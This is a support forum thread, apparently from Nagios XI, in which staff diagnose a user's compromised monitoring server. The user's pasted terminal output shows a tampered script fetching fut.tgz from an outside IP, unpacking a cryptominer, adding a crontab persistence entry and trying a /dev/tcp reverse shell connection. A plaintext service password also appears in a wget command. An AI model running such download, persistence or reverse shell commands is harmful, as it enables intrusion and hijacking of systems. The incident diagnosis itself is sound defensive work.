Error code: 9.

[habuhejleh]

Hi ,

Yes I tried removing the reconfigure_nagios.lock then I ran reconfigure_nagios.sh and I got as below:
login as: root
root@212.118.13.25's password:
Access denied
root@212.118.13.25's password:
Last login: Wed Jul 18 11:29:10 2018 from 212.35.78.178
[root@um-isp-nagios-redline ~]# reconfigure_nagios.sh
-bash: reconfigure_nagios.sh: command not found
[root@um-isp-nagios-redline ~]# cd /usr/local/nagiosxi/scripts
[root@um-isp-nagios-redline scripts]# ./reconfigure_nagios.sh
URL: http://localhost/nagiosxi/includes/components/ccm/
CMDLINE
/usr/bin/wget --save-cookies nagiosql.cookies --keep-session-cookies http://localhost/nagiosxi/includes/components/ccm/ --no-check-certificate --post-data 'submit=Login&hidelog=true&loginSubmitted=true&backend=1&username=nagiosxi&password=MlIvfXBkwP5k3Kxz' -O nagiosql.login--2018-07-18 11:54:47-- http://localhost/nagiosxi/includes/components/ccm/
Resolving localhost... ::1, 127.0.0.1
Connecting to localhost|::1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: “nagiosql.login”

[ <=> ] 35,561 --.-K/s in 0.04s

2018-07-18 11:54:47 (991 KB/s) - “nagiosql.login” saved [35561]

LOGIN SUCCESSFUL!
IMPORTING CONFIG FILES...URL: http://localhost/nagiosxi/includes/components/ccm/
Array
(
)
RESETTING CONFIG PERMS FAILED!\n
[root@um-isp-nagios-redline scripts]#

Please find below outputs you requested:
login as: root
root@212.118.13.25's password:
Access denied
root@212.118.13.25's password:
Last login: Wed Jul 18 11:29:10 2018 from 212.35.78.178
[root@um-isp-nagios-redline ~]# reconfigure_nagios.sh
-bash: reconfigure_nagios.sh: command not found
[root@um-isp-nagios-redline ~]# cd /usr/local/nagiosxi/scripts
[root@um-isp-nagios-redline scripts]# ./reconfigure_nagios.sh
URL: http://localhost/nagiosxi/includes/components/ccm/
CMDLINE
/usr/bin/wget --save-cookies nagiosql.cookies --keep-session-cookies http://localhost/nagiosxi/includes/components/ccm/ --no-check-certificate --post-data 'submit=Login&hidelog=true&loginSubmitted=true&backend=1&username=nagiosxi&password=MlIvfXBkwP5k3Kxz' -O nagiosql.login--2018-07-18 11:54:47-- http://localhost/nagiosxi/includes/components/ccm/
Resolving localhost... ::1, 127.0.0.1
Connecting to localhost|::1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: “nagiosql.login”

[ <=> ] 35,561 --.-K/s in 0.04s

2018-07-18 11:54:47 (991 KB/s) - “nagiosql.login” saved [35561]

LOGIN SUCCESSFUL!
IMPORTING CONFIG FILES...URL: http://localhost/nagiosxi/includes/components/ccm/
Array
(
)
RESETTING CONFIG PERMS FAILED!\n
[root@um-isp-nagios-redline scripts]# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/vg_umispnagiosredline-lv_root 8.4G 7.2G 853M 90% /
tmpfs 3.9G 0 3.9G 0% /dev/shm
/dev/sda1 485M 39M 421M 9% /boot
You have new mail in /var/spool/mail/root
[root@um-isp-nagios-redline scripts]#

I see the errors in the attached in the GUI

And please find in the attached the output of tailerror 100

[root@um-isp-nagios-redline ~]# service httpd status
httpd (pid 1782) is running...
You have new mail in /var/spool/mail/root
[root@um-isp-nagios-redline ~]#

Please advise how to solve all these problems. Appreciate your prompt response.

[lmiltchev]

RESETTING CONFIG PERMS FAILED!\n

This is strange... Can you execute the "reset_config_perms.sh" script logged in as root? Please run the following commands, and show the output.

Code: Select all

cd /usr/local/nagiosxi/scripts/
./reset_config_perms.sh
chage nagios -l
chage apache -l
grep nag /etc/group /etc/passwd

[habuhejleh]

Please find the outputs as below and advise asap:

[root@um-isp-nagios-redline ~]# cd /usr/local/nagiosxi/scripts/
[root@um-isp-nagios-redline scripts]# ./reset_config_perms.sh
sh: no process killed
--2018-07-19 09:23:59-- http://148.204.64.98/fut.tgz
Connecting to 148.204.64.98:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1573544 (1.5M) [application/x-gzip]
Saving to: “fut.tgz”

100%[======================================>] 1,573,544 932K/s in 1.6s

2018-07-19 09:24:01 (932 KB/s) - “fut.tgz” saved [1573544/1573544]

.s/
.s/h64
.s/upd
.s/x
.s/a
.s/cnrig
.s/run
.s/h32
.s/config.json
.s/.cnrig.cacert.pem
* * * * * /var/tmp/.s/upd >/dev/null 2>&1
[root@um-isp-nagios-redline scripts]# ./reset_config_perms.sh: connect: Connecti on refused
./reset_config_perms.sh: line 1: /dev/tcp/128.14.62.194/5566: Connection refused
[root@um-isp-nagios-redline scripts]#


[root@um-isp-nagios-redline scripts]# chage nagios -l
Last password change : Mar 01, 2018
Password expires : never
Password inactive : never
Account expires : never
Minimum number of days between password change : 0
Maximum number of days between password change : 99999
Number of days of warning before password expires : 7
You have new mail in /var/spool/mail/root
[root@um-isp-nagios-redline scripts]#

[root@um-isp-nagios-redline scripts]# chage apache -l
Last password change : Mar 01, 2018
Password expires : never
Password inactive : never
Account expires : never
Minimum number of days between password change : -1
Maximum number of days between password change : -1
Number of days of warning before password expires : -1
[root@um-isp-nagios-redline scripts]#


[root@um-isp-nagios-redline scripts]# grep nag /etc/group /etc/passwd
/etc/group:root0:nagiosadmin
/etc/group:nagios500:nagios,apache
/etc/group:nagcmd501:nagios,apache
/etc/group:nagiosadmin502:
/etc/passwd:nagios500:500::/home/nagios:/bin/bash
/etc/passwd:nagiosadmin501:502::/home/nagiosadmin:/bin/bash
[root@um-isp-nagios-redline scripts]#

[scottwilkerson]

please send a copy of the following file off the server

/usr/local/nagiosxi/scripts/reset_config_perms.sh

It should not be making a connection to http://148.204.64.98/fut.tgz

[habuhejleh]

Here in the attached the file.
Please advise

[scottwilkerson]

This looks like your machine may have been compromised.

I strongly suggest restoring from a backup from before this started occurring and secure your XI server as best you can.

[tmcdonald]

Not only that, you should power the machine down as soon as you can. The last command in the compromised file you shared is connecting back to a remote machine giving someone access.

[habuhejleh]

Hi ,

Is uninstall nagios xi the install can solve this problem and remove the compromise ?
Please confirm.

[rkennedy]

Hi ,

Is uninstall nagios xi the install can solve this problem and remove the compromise ?
Please confirm.

This is a better question for your Security team. Uninstalling Nagios XI will remove all Nagios components, but as @tmcdonald mentioned - you're connecting back to a server in LA over a TCP socket. I look at this as your system has been completely compromised, and no idea what else may be on the system at this point.

http://whois.domaintools.com/128.14.62.194

[scottwilkerson]

You should restart the XI server if you have not already done so.

Then before doing anything else, replace /usr/local/nagiosxi/scripts/reset_config_perms.sh with the file attached.

reset_config_perms.sh

Finally, I would recommend performing an upgrade immediately to prevent yourself from being targeted again.
https://assets.nagios.com/downloads/nag ... ctions.pdf